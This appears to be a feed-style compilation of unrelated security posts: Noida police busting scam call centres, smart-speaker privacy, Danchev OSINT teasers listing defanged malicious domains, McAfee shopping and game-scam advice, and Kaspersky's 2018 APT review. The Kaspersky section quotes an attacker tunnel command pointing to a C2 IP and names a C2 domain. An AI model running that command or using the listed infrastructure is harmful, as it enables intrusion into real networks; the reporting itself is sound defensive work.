Noida police are advancing in their Cyber Crime skills!

As more and more cyber crime enterprises spring up in India, the assistance of their new Centers for Cyber Crime Investigation thtat are becoming more critical to stopping fraud against Americans:

We applaud the Center for Cyber Crime Investigation in Noida


The US Embassy was quick to acknowledge the support of the newest cyber crime partners of the United States after their action at the end of November:

US Embassy to India thanks the Noida and Gurgaon Police for their help!
Another recent Times of India story from November 30, 2018, "Bogus Call Centres and Pop-up Virus Alerts - a Global Cyber Con Spun up in NCR" [NCR = National Capital Region] had more details of this trend, including this graphic:


That's at least 50 call centers shutdown just in these two regions, but with this weeks' 126 arrests being the culmination of an on-going investigation, receiving data from both the FBI and Microsoft.

Local news of India reported the names of some of the gang members held in the November 29-30th action in their story नोएडा: बड़ी कंपनियों में नौकरी दिलाने के नाम पर करते थे धोखाधड़ी, 8 गिरफ्तार (Noida: Fraud, 8 arrested for giving fake jobs in the name of big companies).

Sontosh Gupta, who was the ring leader, was previously employed by an online job site, but then created his own site,  vintechjobs (dot) com, which he used to attract call center employees, many of whom were duped into serving as his scammer army without ever being compensated for their work!

Others arrested then included Mohan Kumar, Paritosh Kumar, Jitendra Kumar, Victor, Himanshu, Ashish Jawla, and Jaswinder.

During that same two day raid, police swept through at least sixteen other call centers, according to this New York Times story, "That Virus Alert on Your Computer? Scammers in India May Be Behind It"
Ajay Pal Sharma, the senior superintendent of police, told the NYT that 50 of his officers swept through eight different call centers in Gautam Budh Nagar as part of the case.  Microsoft's Digital Crimes Unit told the Times that with 1.2 million people generating $28 Billion in India working for call centers, it isn't hard to disguise the shady callers among the legitimate businesses.

The problem is not unique to Delhi and the National Capital Region suburbs that are the current focus.  Back in July, Mumbai was in the headlines, as a massive IRS-imitating Call Center ring was broken up with the help of more great cyber crime investigators from India:

Madan Ballal, Thane Crime Branch, outside Mumbai
Police Inspector Madan Ballal had his story told as the focus of an article in Narratively, "This Indian Cop Took Down a Massive IRS Call-Center Scam".

Much more investigating and arresting needs to be done, but it is a great sign that the problem is now receiving help from an emerging new generation of Indian Cybercrime Detectives!



Smart speakers: Christmas treat or lump of coal?

Christmas is nearly upon us, and thoughts are perhaps turning to various digital presents of a “smart” nature. Home security, hubs, speakers, cameras, and mashups of all of those and more besides.

With regards to speakers, the most immediate pieces of your home are theoretically at your beck and call.

There’s lots of good advice out there in terms of what to do with your new devices. Untick boxes, increase security, perhaps eliminate the “smart” feature entirely by ripping out batteries. However, is it possible that we’re taking things a little too far? Are our concerns justified? Is there, perhaps, a somewhat happy middle ground where these devices can co-exist with us minus an endless sense of panic?

Well, probably not. But maybe we can alleviate a few fears along the way.

Accidents will happen

This is a fact of life. Nothing is 100 percent secure, and nothing is 100 percent free from errors and mishaps. While this is scant consolation if something goes disastrously wrong, accepting that nothing is perfect sometimes goes a long way.

Many of the more “oh no, now what” news stories about smart speaker devices involved an accident, or an unforeseen use of the technology at hand.

Of dollhouses, cookies, and burgers

Many reported incidents are about accidental interactions between users and their devices. Of particular note is the 2017 story of a child somehow managing to place an order for a dollhouse and cookies through Amazon’s Alexa. This became even more confusing when a TV segment apparently caused chaos with a number of additional attempted orders. It’s worth noting that none of those additional attempts seem to have resulted in purchases, so either we’re missing some crucial part of the child’s story or something genuinely malfunctioned in their home.

We also have South Park pranks, and the infamous Burger King ad triggering Google Home to tell their owner all about burgers via text read out aloud from Wikipedia. While this is humorous, it could have easily invited some incredibly dubious messages into the home given anyone can edit Wikipedia text. In fact, the ad text was indeed sabotaged. What a world.

Privacy problems

Accidental recordings are perhaps the biggest potential problem, and certainly most likely to cause a privacy issue. In May 2018, a series of miscues caused private conversations to be sent to a random contact via an Echo speaker. This is, of course, horrendous and could easily have ended in disaster depending on context.

It’s also essential that device owners read all EULAs and privacy policies thoroughly. They’re complicated enough for simple mobile games, without pondering the ramifications of real-world interactions. As I mentioned on Top 10 VPN’s Privacy Central article about this very subject, even if you read through a lot of legal words, there’s no guarantee everything won’t change while you’re not looking.

Listen closely?

The potential threat of always listening devices is prone to overhyping. The biggest issue tends to be accidental activation, from adverts or background noise. It’s rare for speakers to malfunction and listen of their own accord.

Owners may wish to disallow voice-activated devices from being able to lock or unlock entry points into the house, as this is an area of deliberate activation which could cause the most harm. They certainly don’t collect everything said and are deliberately set up to avoid it. Grabbing everything 24/7 would mean device manufacturers simply couldn’t cope with all the data, so it’s in their best interests to be as concise and targeted as possible.

As evidenced by Mozilla’s recent “Privacy not included” list, people seem to have a strong aversion to smart speakers. Amazon and Google’s devices are currently rated “super creepy” by voters, whereas the only smart speaker to have a positive “not creepy” rating at all is the open source Mycroft Mark 1. With a lack of insight into how closed systems are operating inside the home, it perhaps makes sense that people would turn to open source devices where they can get a better understanding of what’s happening instead.

What’s the biggest area of concern?

As I’ve mentioned previously, I believe rogue IoT devices pose the biggest threat to victims of domestic abuse. This is due to ease of access to devices on the part of the malicious individual. The ability to control aspects of the home down to the smallest detail is a potential nightmare scenario. There are ways to combat this, but it’s risky and we always suggest professional support and assistance wherever possible.

Who speaks the truth?

All we can do is look at the evidence on offer and make an informed decision. If you’re okay with the possibility of occasional accidental misfires or mischievous triggers, you’re good to go. We can’t pretend these devices won’t continue to make their way into our homes. What we can do is ensure we take steps to limit harm wherever possible. Keep on top of possible threats as and when they surface, and you’ll hopefully have no problems this festive season.

The post Smart speakers: Christmas treat or lump of coal? appeared first on Malwarebytes Labs.

Dancho Danchev – Cyber Threat Analyst – Join Me on Patreon Community!

Dear blog readers, In the true spirit of the Christmas season I decided to let everyone know that I've recently launched my own Patreon Community Page with the idea to let everyone know that I'm currently busy crowd-funding a high-profile upcoming Cyber Security Investment Project - and I would love to hear from you more details about your thoughts regarding new Tier Features and whether or

Pay-Per-Exploit Acquisition Vulnerability Programs – Pros and cons?

As ZERODIUM starts paying premium rewards to security researchers to acquire their previously unreported zero-day exploits affecting multiple operating systems software and/or devices a logical question emerges in the context of the program's usefulness the potential benefits including potential vulnerabilities within the actual acquisition process - how would the program undermine the

HIstorical OSINT – Malicious Economies of Scale – The Emergence of Efficient Platforms for Exploitation – 2007

Dear blog readers it's been several years since I last posted a quality update following my 2010 disappearance. As it's been quite a significant period of time since I last posted a quality update I feel it's about time I post an quality update by detailing the Web Malware Exploitation market segment circa 2007 prior to my visit to the GCHQ as an independent contractor with the Honeynet Project.

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Serves Scareware

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent blackhat SEO campaign successfully enticing hundreds of thousands globally into interacting with a multi-tude of rogue and malicious software also known as scareware. In this post I'll profile the campaign discuss in-depth the tactics techniques and procedures of the cybercriminals behind it and

Historical OSINT – A Diversified Portfolio of Fake Security Software Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another malicious and fraudulent domain portfolio serving a variety of fake security software also known as scareware potentially exposing hundreds of thousands of users to a variety of fake security software with the cybercriminals behind the campaign potentially earning fraudulent revenue largely relying on the utilization of an affiliate-network

Historical OSINT – A Diversified Portfolio of Fake Security Software

It's 2010 and I've recently stumbled upon a currently active and circulating malicious and fraudulent porfolio of fake security software also known as scareware potentially enticing hundreds of thousands of users to a multi-tude of malicious software with the cybercriminals behind the campaign potentially earning fraudulent revenue in the process of monetizing access to malware-infected hosts

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2008 and I've recently stumbled upon a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into falling victim into fake security software also known as scareware including a variety of dropped fake codecs largely relying on the acquisition of legitimate traffic through active blackhat SEO campaigns in this particular case various North Korea news

Historical OSINT – Spamvertized Swine Flu Domains – Part Two

It's 2010 and I've recently came across to a currently active diverse portfolio of Swine Flu related domains further enticing users into interacting with rogue and malicious content. In this post I'll profile and expose a currently active malicious domains portfolio currently circulating in the wild successfully involved in an ongoing variety of Swine Flu malicious spam campaigns and will

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild Drops Scareware

It's 2010 and I've recently came across to a currently active malicious and fraudulent blackhat SEO campaign successfully enticing users into interacting with rogue and fraudulent scareware-serving malicious and fraudulent campaigns. In this post I'll provide actionable intelligence on the infrastructure behind the campaign. Related malicious domains known to have participated in the campaign:

Historical OSINT – Yet Another Massive Blackhat SEO Campaign Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another diverse portfolio of blackhat SEO domains this time serving rogue security software also known as scareware to unsuspecting users with the cybercriminals behind the campaign successfully earning fraudulent revenue in the process of monetizing access to malware-infected hosts largely relying on the utilization of an affiliate-network based type

Historical OSINT – Profiling a Portfolio of Active 419-Themed Scams

It's 2010 and I've recently decided to provide actionable intelligence on a variety of 419-themed scams in particular the actual malicious actors behind the campaigns with the idea to empower law enforcement and the community with the necessary data to track down and prosecute the malicious actors behind these campaigns. Related malicious and fraudulent emails known to have participated in the

Historical OSINT – Rogue Scareware Dropping Campaign Spotted in the Wild Courtesy of the Koobface Gang

It's 2010 and I've recently came across to a diverse portfolio of fake security software also known as scareware courtesy of the Koobface gang in what appears to be a direct connection between the gang's activities and the Russian Business Network. In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in-depth the tactics techniques and procedures of the

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild – Part Two

It's 2008 and I've recently came across to a massive black hat SEO campaign successfully enticing users into falling victim into fraudulent and malicious scareware-serving campaign. In this post I'll provide actionable intelligence on the infrastructure behind it. Related malicious domains and redirectors known to have participated in the campaign: hxxp://msh-co.com hxxp://incubatedesign.com

Historical OSINT – Massive Blackhat SEO Campaign Spotted in the Wild

It's 2008 and I recently came across to a pretty decent portfolio of rogue and fraudulent malicious scareware-serving domains successfully acquiring traffic through a variety of black hat SEO techniques in this particular case the airplane crash of the Polish president. Related malicious domains known to have participated in the campaign: hxxp://sarahscandies.com hxxp://armadasur.com hxxp://

Historical OSINT – Malware Domains Impersonating Google

It''s 2008 and I've recently stumbled upon a currently active typosquatted portfolio of malware-serving domains successfully impersonating Google further spreading malicious software to hundreds of thousands of unsuspecting users. In this post I'll provide actionable intelligence on the infrastructure behind the campaign. Related malicious domains known to have participated in the campaign:

Historical OSINT – Massive Scareware Dropping Campaign Spotted in the Wild

It's 2008 and I've recently spotted a currently circulating malicious and fraudulent scareware-serving malicious domain portfolio which I'll expose in this post with the idea to share actionable threat intelligence with the security community further exposing and undermining the cybercrime ecosystem the way we know it potentially empowering security researchers and third-party vendors with the

HIstorical OSINT – Latvian ISPs, Scareware, and the Koobface Gang Connection

It's 2010 and we've recently stumbled upon yet another malicious and fraudulent campaign courtesy of the Koobface gang actively serving fake security software also known as scareware to a variety of users with the majority of malicious software conveniently parked within 79.135.152.101 - AS2588, LatnetServiss-AS LATNET ISP successfully hosting a diverse portfolio of fake security software. In

Historical OSINT – Massive Blackhat SEO Campaign Courtesy of the Koobface Gang Spotted in the Wild

It's 2010 and I've recently stumbled upon yet another massive blackhat SEO campaign courtesy of the Koobface gang successfully exposing hundreds of thousands of users to a multi-tude of malicious software. In this post I'll provide actionable intelligence on the infrastructure behind it and discuss in the depth the tactics techniques and procedures of the cybercriminals behind it. Sample

HIstorical OSINT – PhishTube Twitter Broadcast Impersonated Scareware Serving Twitter Accounts Circulating

It's 2010 and I've recently intercepted a currently circulating malicious and fraudulent malware-serving spam campaign successfully enticing hundreds of thousands of users globally into interacting with the rogue and malicious software found on the compromised hosts in combination with a currently active Twitter malware-serving campaign successfully enticing users into interacting with the rogue 

Historical OSINT – Chinese Government Sites Serving Malware

It's 2008 and I'm stumbling upon yet another decent portfolio of compromised malware-serving Chinese government Web sites. In this post I'll discuss in-depth the campaign and provide actionable intelligence on the infrastructure behind it. Compromised Chinese government Web site: hxxp://nynews.gov.cn Sample malicious domains known to have participated in the campaign: hxxp://game1983.com/

Cyber Security Project Investment Proposal – DIA Needipedia – Fight Cybercrime and Cyber Jihad With Sensors – Grab Your Copy Today!

Dear blog readers, I decided to share with everyone a currently pending project investment proposal regarding the upcoming launch of a proprietary Technical Collection analysis platform with the project proposal draft available on request part of DIA's Needipedia Project Proposal Investment draft or eventually through the Smith Richardson Foundation. In case you're interested in working with me

Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online

It was the last item on my list and Christmas was less than a week away. I was on the hunt for a white Northface winter coat my teenage daughter that she had duly ranked as the most-important-die-if-I-don’t-get-it item on her wishlist that year.

After fighting the crowds and scouring the stores to no avail, I went online, stressed and exhausted with my credit card in hand looking for a deal and a Christmas delivery guarantee.

Mistake #1: I was under pressure and cutting it way too close to Christmas.
Mistake #2: I was stressed and exhausted.
Mistake #3: I was adamant about getting the best deal.

Gimme a deal!

It turns out these mistakes created the perfect storm for a scam. I found a site with several name brand named coats available lower prices. I was thrilled to find the exact white coat and guaranteed delivery by Christmas. The cyber elves were working on my behalf for sure!

Only the coat never came and I was out $150.

In my haste and exhaustion, I overlooked a few key things about this “amazing” site that played into the scam. (I’ll won’t harp on the part about me calling customer service a dozen times, writing as many emails, and feeling incredible stupidity over my careless clicking)!

Stress = Digital Risk

I’m not alone in my holiday behaviors it seems. A recent McAfee survey, Stressed Holiday Online Shopping, reveals, unfortunately, that when it comes to online shopping, consumers are often more concerned about finding a deal online than they are with protecting their cybersecurity in the process. 

Here are the kinds of risks stressed consumers are willing to take to get a holiday deal online:

  • 53% think the financial stress of the holidays can lead to careless shopping online.
  • 56% said that they would use a website they were unfamiliar with if it meant they would save money.
  • 51% said they would purchase an item from an untrusted online retailer to get a good deal.
  • 31% would click on a link in an email to get a bargain, regardless of whether they were familiar with the sender.
  • When it comes to sharing personal information to get a good deal: 39% said they would risk sharing their email address, 25% would wager their phone number, and 16% percent would provide their home address.

3 Tips to Safer Online Shopping:

  • Connect with caution. Using public Wi-Fi might seem like a good idea at the moment, but you could be exposing your personal information or credit card details to cybercriminals eavesdropping on the unsecured network. If public Wi-Fi must be used to conduct transactions, use a virtual private network (VPN) to help ensure a secure connection.
  • Slow down and think before you click. Don’t be like me exhausted and desperate while shopping online — think before you click! Cybercriminal love to target victims by using phishing emails disguised as holiday savings or shipping notification, to lure consumers into clicking links that could lead to malware, or a phony website designed to steal personal information. Check directly with the source to verify an offer or shipment.
  • Browse with security protection. Use comprehensive security protection that can help protect devices against malware, phishing attacks, and other threats. Protect your personal information by using a home solution that keeps your identity and financial information secure.
  • Take a nap, stay aware. This may not seem like an important cybersecurity move, but during the holiday rush, stress and exhaustion can wear you down and contribute to poor decision-making online. Outsmarting the cybercrooks means awareness and staying ahead of the threats.

I learned the hard way that holiday stress and shopping do not mix and can easily compromise my online security. I lost $150 that day and I put my credit card information (promptly changed) firmly into a crook’s hands. I hope by reading this, I can help you save far more than that.

Here’s wishing you and your family the Happiest of Holidays! May all your online shopping be merry, bright, and secure from all those pesky digital Grinches!

The post Holiday Rush: How to Check Yourself Before Your Wreck Yourself When Shopping Online appeared first on McAfee Blogs.

Attention Red Dead Redemption 2 Players: Dodge This New Download Scam

Rockstar Games’ Red Dead Redemption 2 has struck a popular chord with many online gamers. Unfortunately, the Western-themed action-adventure game has also become a popular vessel for malicious activity among cybercriminals as well. Scammers are tricking gamers into giving up their personal information with phony “free” downloads of the online game, while simultaneously making a profit on these downloads.

You’re probably wondering how exactly this scam works. It first begins with cybercriminals planting their phony download traps in ads on platforms like YouTube, Twitter, and blog postings. With other, less sophisticated scams, a user would be prompted to install several bundled applications at this point, each one generating revenue for the scammer. But this scheme works a little bit differently. When the user clicks on the “download” button, they are presented with a fake install screen showing the progression of the game’s download process.  The fake install takes about an hour to complete, further giving the illusion that a large file is actually being downloaded on the user’s device.

Once the fake installation is complete, the user is asked to enter a nonexistent license key (a pattern of numbers and/or letters provided to licensed users of a software program). If a user clicks on one of the buttons on this screen, they are redirected to a website asking for human verification in the form of surveys and questionnaires. These surveys trick the user into divulging their personal information for the cybercriminal’s disposal. What’s more, the scammer earns revenue for their malicious acts.

Because this scheme tricks users into handing over their personal information, it affects a victim’s overall privacy. Luckily, there are steps users can take to combat this threat:

  • Browse with caution. Many scammers target gamers through popular websites like YouTube and Twitter to push out malicious content. Use discretion when browsing these websites.
  • Only download content from trusted sources. If you come across a download offer that seems too good to be true, it probably is. Only download software from legitimate sources and avoid sites if you can’t tell whether they are trustworthy or not.
  • Use security software to browse the internet. Sometimes, it can be hard to distinguish whether a site is malicious or not. Security solutions like McAfee WebAdvisor can detect the URLs and scam installers associated with this threat.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post Attention Red Dead Redemption 2 Players: Dodge This New Download Scam appeared first on McAfee Blogs.

Kaspersky Security Bulletin 2018. Top security stories

Introduction

The internet is now woven into the fabric of our lives. Many people routinely bank, shop and socialize online and the internet is the lifeblood of commercial organizations. The dependence on technology of governments, businesses and consumers provides a broad attack surface for attackers with all kinds of motives – financial theft, theft of data, disruption, damage, reputational damage or simply ‘for the lulz’. The result is a threat landscape that ranges from highly sophisticated targeted attacks to opportunistic cybercrime. All too often, both rely on manipulating human psychology as a way of compromising entire systems or individual computers. Increasingly, the devices targeted also include those that we don’t consider to be computers – from children’s toys to security cameras. Here is our annual round-up of major incidents and key trends from 2018

Targeted attack campaigns

At this year’s Security Analyst Summit we reported on Slingshot – a sophisticated cyber-espionage platform that has been used to target victims in the Middle East and Africa since 2012. We discovered this threat – which rivals Regin and ProjectSauron in its complexity – during an incident investigation. Slingshot uses an unusual (and, as far as we know, unique) attack vector: many of the victims were attacked by means of compromised MikroTik routers. The exact method for compromising the routers is not clear, but the attackers have found a way to add a malicious DLL to the device: this DLL is a downloader for other malicious files that are then stored on the router. When a system administrator logs in to configure the router, the router’s management software downloads and runs a malicious module on the administrator’s computer. Slingshot loads a number of modules on a compromised computer, but the two most notable are Cahnadr and GollumApp – which are, respectively, kernel mode and user mode modules. Together, they provide the functionality to maintain persistence, manage the file system, exfiltrate data and communicate with the C2 (command-and-control) server. The samples we looked at were marked as ‘version 6.x’, suggesting that the threat has existed for a considerable length of time. The time, skill and cost involved in creating Slingshot indicates that the group behind it is likely to be highly organized and professional, and probably state sponsored.

Soon after the start of the Winter Olympics in Pyeongchang, we began receiving reports of malware attacks on infrastructure related to the games. Olympic Destroyer shut down display monitors, killed Wi-Fi and took down the Olympics website – preventing visitors from printing tickets. The attack also affected other organizations in the region – for example, ski gates and ski lifts were disabled at several South Korean ski resorts. Olympic Destroyer is a network worm, the main aim of which is to wipe files from remote network shares of its victims. In the days that followed the attack, research teams and media companies around the world variously attributed the attack to Russia, China and North Korea – based on a number of features previously attributed to cyber-espionage and sabotage groups allegedly based in those countries or working for the governments of those countries. Our own researchers were also trying to understand which group was behind the attack. At one stage during our research, we discovered something that seemed to indicate that the Lazarus group was behind the attack. We found a unique trace left by the attackers that exactly matched a previously known Lazarus malware component. However, the lack of obvious motive and inconsistencies with known Lazarus TTPs (tactics, techniques and procedures) that we found during our on-site investigation at a compromised facility in South Korea led us to look again at this artefact. When we did so, we discovered that the set of features didn’t match the code – it had been forged to perfectly match the fingerprint used by Lazarus. So we concluded that the ‘fingerprint’ was a very sophisticated false flag, intentionally placed inside the malware in order to give threat hunters the impression that they had found a ‘smoking gun’ and diverting them from a more accurate attribution.


OlympicDestroyer component relations

We continued to track this APT group’s activities and noticed in June that they had started a new campaign with a different geographical distribution and using new themes. Our telemetry, and the characteristics of the spear-phishing documents we analysed, indicated that the attacker behind Olympic Destroyer was targeting financial and biotechnology-related organizations based in Europe – specifically, Russia, the Netherlands, Germany, Switzerland and Ukraine. The earlier Olympic Destroyer attacks – designed to destroy and paralyze the infrastructure of the Winter Olympic Games and related supply chains, partners and venues – were preceded by a reconnaissance operation. This suggested to us that the new activities were part of another reconnaissance stage that would be followed by a wave of destructive attacks with new motives. The variety of financial and non-financial targets could indicate that the same malware was being used by several groups with different interests. This could also be the result of cyberattack outsourcing, which is not uncommon among nation-state threat actors. However, it’s also possible that the financial targets are another false-flag operation by a threat actor that has already shown that they excel at this.

In April, we reported the workings of Operation Parliament, a cyber-espionage campaign aimed at high-profile legislative, executive and judicial organizations around the world – with its main focus in the Middle East and North Africa region, especially Palestine. The attacks, which started early in 2017, targeted parliaments, senates, top state offices and officials, political science scholars, military and intelligence agencies, ministries, media outlets, research centers, election commissions, Olympic organizations, large trading companies and others. The targeting of victims was unlike that of previous campaigns in the region (Gaza Cybergang or Desert Falcons) and points to an elaborate information-gathering exercise that was carried out prior to the attacks (physical and/or digital). The attackers have been particularly careful to verify victim devices before proceeding with the infection, safeguarding their C2 servers. The attacks slowed down after the start of 2018, probably because the attackers achieved their objectives.

We have continued to track the activities of Crouching Yeti (aka Energetic Bear), an APT group that has been active since at least 2010, mainly targeting energy and industrial companies. The group targets organizations around the world, but with a particular focus on Europe, the US and Turkey – the latter being a new addition to the group’s interests during 2016-17. The group’s main tactics include sending phishing emails with malicious documents and infecting servers for different purposes, including hosting tools and logs and watering-hole attacks. Crouching Yeti’s activities against US targets have been publicly discussed by US-CERT and the UK National Cyber Security Centre (NCSC). In April, Kaspersky Lab ICS CERT provided information on identified servers infected and used by Crouching Yeti and presented the findings of an analysis of several web servers compromised by the group during 2016 and early 2017. You can read the full report here, but below is a summary of our findings.

  1. With rare exceptions, the group’s members get by with publicly available tools. The use of publicly available utilities by the group to conduct its attacks renders the task of attack attribution without any additional group ‘markers’ very difficult.
  2. Potentially, any vulnerable server on the internet is of interest to the attackers when they want to establish a foothold in order to develop further attacks against target facilities.
  3. In most cases that we have observed, the group performed tasks related to searching for vulnerabilities, gaining persistence on various hosts, and stealing authentication data.
  4. The diversity of victims may indicate the diversity of the attackers’ interests.
  5. It can be assumed with some degree of certainty that the group operates in the interests of or takes orders from customers that are external to it, performing initial data collection, the theft of authentication data and gaining persistence on resources that are suitable for the attack’s further development.

In May, researchers from Cisco Talos published the results of their research into VPNFilter, malware used to infect different brands of router – mainly in Ukraine, although affecting routers in 54 countries in total. You can read their analysis here and here. Initially, they believed that the malware had infected around 500,000 routers – Linksys, MikroTik, Netgear and TP-Link networking equipment in the small office/home office (SOHO) sector, and QNAP network-attached storage (NAS) devices. However, it later became clear that the list of infected routers was much longer – 75 in total, including ASUS, D-Link, Huawei, Ubiquiti, UPVEL and ZTE. The malware is capable of bricking the infected device, executing shell commands for further manipulation, creating a TOR configuration for anonymous access to the device or configuring the router’s proxy port and proxy URL to manipulate browsing sessions. However, it also spreads into networks supported by the device, thereby extending the scope of the attack. Researchers from our Global Research and Analysis Team (GReAT) took a detailed look at the C2 mechanism used by VPNFilter. One of the interesting questions is who is behind this malware. Cisco Talos indicated that a state-sponsored or state affiliated threat actor is responsible. In its affidavit for sink-holing the C2, the FBI suggests that Sofacy (aka APT28, Pawn Storm, Sednit, STRONTIUM, and Tsar Team) is the culprit. There is some code overlap with the BlackEnergy malware used in previous attacks in Ukraine (the FBI’s affidavit makes it clear that they see BlackEnergy (aka Sandworm) as a sub-group of Sofacy).

Sofacy is a highly active and prolific cyber-espionage group that Kaspersky Lab has been tracking for many years. In February, we published an overview of Sofacy activities in 2017, revealing a gradual move away from NATO-related targets at the start of 2017, towards targets in the Middle East, Central Asia and beyond. Sofacy uses spear-phishing and watering-hole attacks to steal information, including account credentials, sensitive communications and documents. This threat actor also makes use of zero-day vulnerabilities to deploy its malware.

Sofacy deploys different tools for different target profiles. Early in 2017 the group’s Dealer’s Choice campaign was used to target military and diplomatic organizations (mainly in NATO countries and Ukraine). Later in the year, the group used other tools from its arsenal, Zebrocy and SPLM, to target a broader range of organizations, including science and engineering centers and press services, with more of a focus on Central Asia and the Far East. Like other sophisticated threat actors, Sofacy continually develops new tools, maintains a high level of operational security and focuses on making its malware hard to detect. Once any signs of activity by an advanced threat actor such as Sofacy have been found in a network, it’s important to review logins and unusual administrator access on systems, thoroughly scan and sandbox incoming attachments, and maintain two-factor authentication for services such as email and VPN access. The use of APT intelligence reports, threat hunting tools such as YARA and advanced detection solutions such as KATA (Kaspersky Anti Targeted Attack Platform) will help you to understand their targeting and provide powerful ways of detecting their activities.

Our research shows that Sofacy is not the only threat actor operating in the Far East and this sometimes results in a target overlap between very different threat actors. We have seen cases where the Sofacy Zebrocy malware has competed for access to victims’ computers with the Russian-speaking Mosquito Turla clusters; and where its SPLM backdoor has competed with the traditional Turla and Chinese-speaking Danti attacks. The shared targets included government administration, technology, science and military-related organizations in or from Central Asia. The most intriguing overlap is probably that between Sofacy and the English-speaking threat actor behind the Lamberts family. The connection was discovered after researchers detected the presence of Sofacy on a server that threat intelligence had previously identified as compromised by Grey Lambert malware. The server belongs to a Chinese conglomerate that designs and manufactures aerospace and air defense technologies. However, in this case the original SPLM delivery vector remains unknown. This raises a number of hypothetical possibilities, including the fact that Sofacy could be using a new, and as yet undetected, exploit or a new strain of its backdoor, or that Sofacy somehow managed to harness Grey Lambert’s communication channels to download its malware. It could even be a false flag, planted during the previous Lambert infection. We think that the most likely answer is that an unknown new PowerShell script or legitimate but vulnerable web app was exploited to load and execute the SPLM code.

In June, we reported an ongoing campaign targeting a national data centre in Central Asia. The choice of target was especially significant – it means that the attackers were able to gain access to a wide range of government resources in one fell swoop. We think they did this by inserting malicious scripts into the country’s official websites in order to conduct watering-hole attacks. We attribute this campaign to the Chinese-speaking threat actor, LuckyMouse (aka EmissaryPanda and APT27) because of the tools and tactics used in the campaign, because the C2 domain – ‘update.iaacstudio[.]com’ – was previously used by this group and because they have previously targeted government organizations, including Central Asian ones. The initial infection vector used in the attack against the data center is unclear. Even where we observed LuckyMouse using weaponized documents with CVE-2017-118822 (Microsoft Office Equation Editor, widely used by Chinese-speaking actors since December 2017), we couldn’t prove that they were related to this particular attack. It’s possible that the attackers used a watering hole to infect data center employees.

We reported another LuckyMouse campaign in September. Since March, we had found several infections where a previously unknown Trojan was injected into the ‘lsass.exe’ system process memory. These implants were injected by the digitally signed 32- and 64-bit network filtering driver NDISProxy. Interestingly, this driver is signed with a digital certificate that belongs to the Chinese company LeagSoft, a developer of information security software based in Shenzhen, Guangdong. We informed the company about the issue via CN-CERT. This campaign targeted Central Asian government organizations and we believe the attack was linked to a high-level meeting in the region. The choice of the Earthworm tunneler used in the attack is typical for Chinese-speaking actors. Also, one of the commands used by the attackers (‘-s rssocks -d 103.75.190[.]28 -e 443’) creates a tunnel to a previously known LuckyMouse C2 server. The choice of victims in this campaign also aligns with the previous interests shown by this threat actor. We did not see any indications of spear-phishing or watering-hole activity: and we think that the attackers spread their infectors through networks that were already compromised.

Lazarus is a well-established threat actor that has conducted cyber-espionage and cybersabotage campaigns since at least 2009. In recent years, the group has launched campaigns against financial organizations around the globe. In August we reported that the group had successfully compromised several banks and infiltrated a number of global crypto-currency exchanges and fintech companies. While assisting with an incident response operation, we learned that the victim had been infected with the help of a Trojanized crypto-currency trading application that had been recommended to the company over email. An unsuspecting employee had downloaded a third-party application from a legitimate looking website, infecting their computer with malware known as Fallchill, an old tool that Lazarus has recently started using again. It seems as though Lazarus has found an elaborate way to create a legitimate looking site and inject a malicious payload into a ‘legitimate looking’ software update mechanism – in this case, creating a fake supply chain rather than compromising a real one. At any rate, the success of the Lazarus group in compromising supply chains suggests that it will continue to exploit this method of attack. The attackers went the extra mile and developed malware for non-Windows platforms – they included a Mac OS version and the website suggests that a Linux version is coming soon. This is probably the first time that we’ve seen this APT group using malware for Mac OS. It looks as though, in the chase after advanced targets, software developers from supply chains and some high-profile targets, threat actors are forced to develop Mac OS malware tools. The fact that the Lazarus group has expanded its list of targeted operating systems should be a wake-up call for users of non-Windows platforms. You can read our report on Operation AppleJeus here.

Turla (aka Venomous Bear, Waterbug, and Uroboros) is best known for what was, at the time, an ultra-complex Snake rootkit focused on NATO-related targets. However, this threat actor’s activity is much broader. In October, we reported on the Turla group’s recent activities, revealing an interesting mix of old code, new code, and new speculations as to where they will strike next and what they will shed. Much of our 2018 research focused on the group’s KopiLuwak JavaScript backdoor, new variants of the Carbon framework and Meterpreter delivery techniques. Other interesting aspects were the changing Mosquito delivery techniques, customized PoshSec-Mod open-source PowerShell use and borrowed injector code. We tied some of this activity together with infrastructure and data points from WhiteBear and Mosquito infrastructure and activity in 2017 and 2018. One interesting aspect of our research was the lack of ongoing targeting overlap with other APT activity. Turla was absent from the milestone DNC hack event – where Sofacy and CozyDuke were both present – but the group was quietly active around the globe on other projects. This provides some insight into the ongoing motivations and ambitions of the group. It is interesting that data related to these organizations has not been weaponized and found online while this Turla activity quietly carries on. Both Mosquito and Carbon projects focus mainly on diplomatic and foreign affairs targets, while WhiteAtlas and WhiteBear activity stretched across the globe to include organizations related to foreign affairs, but not all targeting has consistently followed this profile: the group also targeted scientific and technical centres, along with organizations outside the political arena. The group’s KopiLuwak activity does not necessarily focus on diplomatic and foreign affairs. Instead, 2018 activity targeted government-related scientific and energy research organizations and a government-related communications organization in Afghanistan. This highly selective but wider targeting set will probably continue into 2019.

In October, we reported the recent activity of the MuddyWater APT group. Our past telemetry indicates that this relatively new threat actor, which surfaced in 2017, has focused mainly on government targets in Iraq and Saudi Arabia. However, the group behind MuddyWater has been known to target other countries in the Middle East, Europe and the US. We recently noticed a large number of spear-phishing documents that appear to be targeting government bodies, military entities, telcos and educational institutions in Jordan, Turkey, Azerbaijan and Pakistan, in addition to the continuous targeting of Iraq and Saudi Arabia. Other victims were detected in Mali, Austria, Russia, Iran and Bahrain. These new documents have appeared throughout 2018 and the activity escalated from May onwards. The new spear-phishing documents rely on social engineering to persuade the victims to enable macros. The attackers rely on a range of compromised hosts to deliver their attacks. In the advanced stages of our research, we were able not only to observe additional files and tools from the group’s arsenal but also some OPSEC mistakes made by the attackers. In order to protect against malware attacks, we would recommend the following measures:

  • Educate general staff so that they are able to identify malicious behaviour such as phishing links.
  • Educate information security staff to ensure that they have full configuration, investigative and hunting abilities.
